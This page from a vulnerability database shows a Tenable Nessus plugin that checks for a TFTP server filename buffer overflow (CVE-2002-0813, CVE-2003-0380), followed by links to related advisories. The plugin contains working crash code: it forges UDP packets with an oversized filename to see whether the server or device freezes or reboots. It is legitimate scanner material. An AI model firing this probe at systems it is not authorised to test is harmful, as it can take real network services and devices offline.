Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2005-2022 Tenable Network Security, Inc.TFTPD_OVERFLOW.NASL
HistoryMay 16, 2005 - 12:00 a.m.

TFTPD Server Filename Handling Remote Overflow

2005-05-1600:00:00
This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.
www.tenable.com
28
JSON

The remote TFTP server dies when it receives a too big UDP datagram.
An attacker may use this flaw to disable the server, or even execute arbitrary code on the system.

#
# (C) Tenable Network Security, Inc.
#

# Not tested against a vulnerable server!

include("compat.inc");

if (description)
{
 script_id(18264);
 script_version("1.22");
 script_set_attribute(attribute:"plugin_modification_date", value:"2022/08/15");

 # Not sure for 10526 or 11584
 # BID=6043 / CVE-2002-1542 is different
 script_cve_id("CVE-2002-0813", "CVE-2003-0380");
 script_bugtraq_id(401, 5328, 7819);

 script_name(english:"TFTPD Server Filename Handling Remote Overflow");
 script_summary(english:"Crashes TFTPD with a big UDP datagram");

 script_set_attribute(attribute:"synopsis", value:
"The remote host has an application that is affected by a buffer
overflow vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote TFTP server dies when it receives a too big UDP datagram.
An attacker may use this flaw to disable the server, or even execute
arbitrary code on the system.");
 script_set_attribute(attribute:"solution", value:"Upgrade software, or disable this service.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_cwe_id(119);

 script_set_attribute(attribute:"vuln_publication_date", value:"2002/07/25");
 script_set_attribute(attribute:"plugin_publication_date", value:"2005/05/16");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 # Not an ACT_DESTRUCTIVE_ATTACK (see CVE-2002-0813), should be an ACT_KILL_HOST
 # but sending 700+ packets is slow
 script_category(ACT_FLOOD);

 script_copyright(english:"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.");
 script_family(english:"Gain a shell remotely");

 script_require_keys("Services/udp/tftp", "Settings/ParanoidReport");

 exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);

if(islocalhost()) exit(0);	# ?

# This function cannot yet send UDP packets bigger than the MTU
# TBD: write 'fragment_packet' function
function tftp_ping(port, huge)
{
 local_var	req, rep, sport, ip, u, filter, data, i;

 debug_print('tftp_ping: huge=', huge, '\n');

 if (huge)
  req = '\x00\x01'+crap(huge)+'\0netascii\0';
 else
  req = '\x00\x01Nessus'+rand()+'\0netascii\0';

 sport = rand() % 64512 + 1024;
 ip = forge_ip_packet(ip_hl : 5, ip_v: 4,  ip_tos:0,
	ip_len:20, ip_off:0, ip_ttl:64, ip_p:IPPROTO_UDP,
	ip_src: compat::this_host());

 u = forge_udp_packet(ip:ip, uh_sport: sport, uh_dport:port, uh_ulen: 8 + strlen(req), data:req);

 filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';

 data = NULL;
 for (i = 0; i < 2; i ++)	# Try twice
 {
  rep = send_packet(u, pcap_active:TRUE, pcap_filter:filter);
  if(rep)
  {
   dbg::detailed_log(lvl:3, src:FUNCTION_NAME, msg:'TFTP (IP)', msg_details:{"Data":{"lvl":3, "value":rep}});
   data = get_udp_element(udp: rep, element:"data");
   dbg::detailed_log(lvl:3, src:FUNCTION_NAME, msg:'TFTP (UDP)', msg_details:{"Data":{"lvl":3, "value":data}});
   if (data[0] == '\0' && (data[1] == '\x03' || data[1] == '\x05'))
   {
    debug_print('tftp_ping(port=', port, ',huge=', huge, ') succeeded\n');
    return TRUE;
   }
  }
 }
 debug_print('tftp_ping(port=', port, ',huge=', huge, ') failed\n');
 return FALSE;
}

#
port = get_kb_item('Services/udp/tftp');
if (! port) port = 69;
if (get_kb_item('tftp/'+port+'/backdoor')) exit(0);
if (! tftp_ping(port: port)) exit(0);

start_denial();

# 700 is good for CISCO, and more than enough for atftpd
# 1000 might be necessary WinAgents, but the flaw might be different
tftp_ping(port: port, huge: 1000);

# I'll check this first, in case the device reboots
tftpalive = tftp_ping(port: port);
alive = end_denial();

if (! alive)
 {
  report = string("\n\n",
    "The remote device freezes or reboots when a too big UDP datagram","\n",
    "is sent to the TFTP server.",
    "\n");
    security_hole(port: port, proto: "udp", extra:report);
  }
else
 if (! tftpalive)
  security_hole(port: port, proto: "udp");

if (! alive || ! tftpalive)
 set_kb_item(name: 'tftp/'+port+'/overflow', value: TRUE);

Related

openvas 3
debian 1
cve 3
nessus 2
debiancve 1
cisco 1
openvas
openvas
TFTPD overflow
2005-11-03 00:00:00
Debian Security Advisory DSA 314-1 (atftp)
2008-01-17 00:00:00
Debian Security Advisory DSA 314-1 (atftp)
2008-01-17 00:00:00
debian
debian
[SECURITY] [DSA-314-1] New atftp packages fix buffer overflow
2003-06-11 23:28:31
cve
cve
CVE-2003-0380
2003-07-02 04:00:00
CVE-2002-1542
2003-03-31 05:00:00
CVE-2002-0813
2002-08-12 04:00:00
nessus
nessus
Debian DSA-314-1 : atftp - buffer overflow
2004-09-29 00:00:00
Cisco TFTP Server Long Filename DoS (CSCdy03429)
2002-07-30 00:00:00
debiancve
debiancve
CVE-2003-0380
2003-07-02 04:00:00
cisco
cisco
TFTP Long Filename Vulnerability
2002-07-30 18:00:00
JSON
Related for TFTPD_OVERFLOW.NASL
openvas3debian1cve3nessus2debiancve1cisco1